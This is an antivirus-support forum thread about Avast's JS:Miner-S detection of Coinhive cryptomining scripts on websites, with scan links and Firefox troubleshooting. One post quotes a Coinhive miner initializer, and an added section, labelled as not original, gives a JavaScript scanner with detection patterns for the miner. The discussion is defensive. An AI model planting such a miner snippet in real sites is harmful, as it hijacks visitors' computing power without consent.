Avast WEBforum

Other => Viruses and worms => Topic started by: TheOwner on April 16, 2018, 05:26:01 PM

Title: JS:Miner-S
Post by: TheOwner on April 16, 2018, 05:26:01 PM
Hello,
Avast blocks one site and marks it as JS:Miner-S. Although I know there is a coinhive miner on that site, I use uBlock Origin to block it. So why does Avast detect it? Is it some new version that uBlock does not block?
Before that it was Miner C, now it is S. What is the difference?
Thank you.
Title: Re: JS:Miner-S
Post by: LukasJ on April 16, 2018, 05:30:31 PM
Hi,
Yes, detection JS:Miner-S blocks new coinhive scripts.

Lukas
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 05:51:46 PM
Quote
Avast blocks one site and marks it as JS:Miner-S. Although I know there is a coinhive miner on that site, I use uBlock Origin to block it. So why does Avast detect it? Is it some new version that uBlock does not block?

Maybe, or the Avast Web Shield reads the HTML code before uBlock.


Quote
Before that it was Miner C, now it is S. What is the difference?

Just like cars, there are many variations and all don't come from the same factory ;)

https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html


Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 06:07:07 PM
So I found that Avast detects the miner when I visit that site and tells me a miner was found. The strange thing is that when I look at what was blocked, it did not block one JavaScript file; it blocked the URL of that page, not a file.
Also, the coinhive script is blocked by uBlock Origin; if I disable it, Avast detects Miner C.
So I don't understand what version S means. It does not block any single file. It seems Avast is trying to block known mining sites, but that site works even though Avast tried to block it.

https://urlquery.net/report/1fef71de-7294-4882-b5d0-5af3dda68faa
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 06:09:56 PM
They may also add a URL block ... double protection.

What URL is it? Post it non-clickable.

Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 07:59:15 PM
Sucuri  >>  https://sitecheck.sucuri.net/results/primeassteens.com

Malware entry: malware.cryptominer.3  >>  http://labs.sucuri.net/db/malware/malware.cryptominer.3

HTML_sample scan  >>  https://www.virustotal.com/#/file/7da3ba6dd20d61ccb18bfb9785b5280890db417770401efd596fa0103b556d1a/detection

Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 08:07:41 PM
Sample.txt? I still don't understand what triggers this popup.
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 08:12:16 PM
Quote
Sample.txt? I still don't understand what triggers this popup.

Website is infected with miner script ... what is strange?

Post a screenshot of the popup.

Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 08:14:20 PM
I know that! coinhive.com/lib/coinhive.min.js is Miner C. But where did you find the S version? In which file?
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 08:16:24 PM
Quote
I know that! coinhive.com/lib/coinhive.min.js is Miner C. But where did you find the S version? In which file?

primeassteens.com >> HTML code

Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 08:24:20 PM
OK, I removed coinhive.com/lib/coinhive.min.js from that HTML code, tried VirusTotal again and now it is clean. So it is just two detections of that same file.
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 08:43:46 PM
The .js file at that location changes, you find many previous versions (different MD5) searching VT

Title: Re: JS:Miner-S
Post by: TheOwner on April 17, 2018, 03:43:07 PM
Yes, it is possible, but if I go to that site without uBlock, Avast reports 2 detections: one C version that marks the .js file and one S version that marks the HTML code. But when I block that .js file with uBlock, Avast still reports the S version, even though that miner cannot work without that .js file.

I found that the S version is triggered by this script:
(script)
   var miner = new C o i n H i v e. A n  o n y m o u s('XXXXXXXXXXXXXXXXXXXXXXXXX', {
   // threads: X,
   throttle: X,
});
   miner.start();
(/script)
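
Added example (not part of the original posts, and not Avast's signature logic): a small static check that reports the two indicators discussed in this thread separately, the external library reference and the inline initializer left in the HTML. The regexes, function names and the sample page are assumptions constructed for illustration.

```javascript
// Indicator 1: a <script src=...> that loads the miner library from coinhive.com/lib/
const LIBRARY_SRC = /<script[^>]+src\s*=\s*["']?[^"'>\s]*coinhive\.com\/lib\/[^"'>\s]+/gi;
// Indicator 2: an inline constructor call on the CoinHive object (any constructor name)
const INLINE_INIT = /new\s+CoinHive\s*\.\s*(\w+)\s*\(/g;
const START_CALL = /\.\s*start\s*\(/;

// Return the bodies of <script> elements that have no src attribute.
function inlineScripts(html) {
  const bodies = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1])) bodies.push(m[2]);
  }
  return bodies;
}

// Scan page source and list each indicator as its own finding.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(LIBRARY_SRC)) {
    findings.push({ kind: "external-library", evidence: m[0] });
  }
  for (const body of inlineScripts(html)) {
    for (const m of body.matchAll(INLINE_INIT)) {
      findings.push({ kind: "inline-initializer", api: m[1], started: START_CALL.test(body) });
    }
  }
  return findings;
}

// Model a content blocker that removes only the external library tag.
function stripLibrary(html) {
  return html.replace(/<script[^>]+src=[^>]*coinhive\.com[^>]*>\s*<\/script>/gi, "");
}

// Constructed sample page; the site key and throttle value are placeholders.
const SAMPLE = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.5 });
  miner.start();
</script>
</head><body>constructed sample page</body></html>`;

console.log(scanHtml(SAMPLE));               // both indicators
console.log(scanHtml(stripLibrary(SAMPLE))); // inline initializer only
```

With the library tag removed the initializer cannot run, but it is still present in the page source, so a scanner that inspects the HTML keeps reporting it.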
Title: Re: JS:Miner-S
Post by: TheOwner on April 20, 2018, 07:43:46 PM
Today I no longer see the JS:Miner-S detection on that site, although that code is still present. I saved the HTML code to a .txt file and sent it to VirusTotal, and also right-clicked that file -> scan by Avast. Both detect JS:Miner-S but the Web Shield does not. When I copied that code here, Avast detected it too. Does that mean this code is whitelisted on that site?
Title: Re: JS:Miner-S
Post by: jefferson sant on April 23, 2018, 02:01:50 AM
Hello.

Script is contaminated by all links from primeassteens, not only homepage.

https://www.virustotal.com/#/file/b1a6d6d809bb0ed2c98c286cbc8b36fa0366b2a051cbb384e179685415dbea51/detection

Avast detected JS:Miner-S blocked is all, if this is not for, the address will connect to the server coinhive as authedmine unnoticed by the user and download i.e. 2 variants.

worker-asmjs.min.js

https://www.virustotal.com/#/file/ee374ae08f22d91a92cfcf6b9d8b4cccfd0d57016e9d8fd3af9fbdbd36781b38/detection

coinhive.min[1].js

https://www.virustotal.com/#/file/5d514880ad502302dd4bf0ef8da5d38356385d1c43689f6739f6771ed7a4ef73/detection

JS Miner-C contained the known code Cryptojacking that used, it was modified with a new variant in the site of the coinhive, it is detected as BV:Miner-T [Trj] algorithm new CryptoNight.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 01:43:13 AM
Hello all!

I have this virus for a month or two and it connects on a site when I start firefox. Avast blocks this attempt but he doesn't show where the virus is located, or perhaps it is in firefox. Can somebody help me locate it?

https://ibb.co/gau3Ud
Title: Re: JS:Miner-S
Post by: mchain on June 13, 2018, 02:40:44 AM
Miner script is found on this website scanning tool:  http://urlquery.net/report/22b5edd4-362f-4845-b05d-af6c5286fd78

Please follow instructions here:  https://forum.avast.com/index.php?topic=194892.0

Sass Drake will be notified once you post the logs.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 05:58:36 AM
I removed 51 threats but JS:Miner-S [Trj] is still there.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 06:13:15 AM
Logs from the Farbar Recovery Scan Tool.
Title: Re: JS:Miner-S
Post by: mchain on June 13, 2018, 07:16:38 AM
Good job.

Sass Drake has been notified.
Title: Re: JS:Miner-S
Post by: Pondus on June 13, 2018, 07:44:12 AM
Quote
Hello all!

I have this virus for a month or two and it connects on a site when I start firefox. Avast blocks this attempt but he doesn't show where the virus is located, or perhaps it is in firefox. Can somebody help me locate it?

https://ibb.co/gau3Ud

Yes "he" does

The JS:Miner-S [Trj] is detected on the website (-http://siska.tv/  = a porn site ) and not in your computer, however you have something trying to connect to that URL. Tried to clear your browser's surf history/cache?

URL Blacklist check
https://www.virustotal.com/#/url/a160501d6ea44e2d7ebba72ccc184c5507f90a3916823132f11e59e3574cf9ec/detection

HTML scan
https://www.virustotal.com/#/file/599d2d25b1dceac8e4a8a385001b59cea6d9d92896f08be04fbb61e1cba21cd0/detection

https://sitecheck.sucuri.net/results/siska.tv



Title: Re: JS:Miner-S
Post by: Sass Drake on June 13, 2018, 04:53:29 PM
Open this URL in Firefox.

Code:
about:serviceworkers
And remove/unregister everything it lists.

Report status after that.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 05:49:01 PM
Quote
Quote
Hello all!

I have this virus for a month or two and it connects on a site when I start firefox. Avast blocks this attempt but he doesn't show where the virus is located, or perhaps it is in firefox. Can somebody help me locate it?

https://ibb.co/gau3Ud

Yes "he" does

The JS:Miner-S [Trj] is detected on the website (-http://siska.tv/  = a porn site ) and not in your computer, however you have something trying to connect to that URL. Tried to clear your browser's surf history/cache?

URL Blacklist check
https://www.virustotal.com/#/url/a160501d6ea44e2d7ebba72ccc184c5507f90a3916823132f11e59e3574cf9ec/detection

HTML scan
https://www.virustotal.com/#/file/599d2d25b1dceac8e4a8a385001b59cea6d9d92896f08be04fbb61e1cba21cd0/detection

https://sitecheck.sucuri.net/results/siska.tv

Sure, I have done all cleanings and a new installation of firefox but nothing changed.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 06:02:04 PM
Quote
Open this URL in Firefox.

Code:
about:serviceworkers
And remove/unregister everything it lists.

Report status after that.

I did, still there.
Title: Re: JS:Miner-S
Post by: Sass Drake on June 13, 2018, 10:19:59 PM
Try to refresh Firefox. Go to:
about:support

and click on Refresh Firefox on the right.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 14, 2018, 01:25:38 AM
Quote
Try to refresh Firefox. Go to:
about:support

and click on Refresh Firefox on the right.

I found on the right side the option for cleaning up firefox, I used it and no change, the miner is still present.

Also Malwarebytes alarms me about additional connections to diverse sites from malware that it can not find.
Title: Re: JS:Miner-S
Post by: Sass Drake on June 14, 2018, 07:31:10 PM
Let's check if the router is the one to blame. Set Google DNS on your PC. Instructions -> https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10

Restart your PC after this and check if notifications will appear again.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 20, 2018, 04:38:57 AM
Quote
Let's check if the router is the one to blame. Set Google DNS on your PC. Instructions -> https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10

Restart your PC after this and check if notifications will appear again.

The problem continues.  :-\
Title: Re: JS:Miner-S
Post by: Sass Drake on June 20, 2018, 04:25:57 PM
Please post new FRST.txt and Addition.txt.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 25, 2018, 09:15:34 AM
Quote
Please post new FRST.txt and Addition.txt.

Suddenly Avast stopped alarming about the threat.
Title: Re: JS:Miner-S
Post by: Sass Drake on June 25, 2018, 09:49:57 AM
Rename FRST64 to uninstall and run it. FRST should be uninstalled.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 25, 2018, 04:48:35 PM
...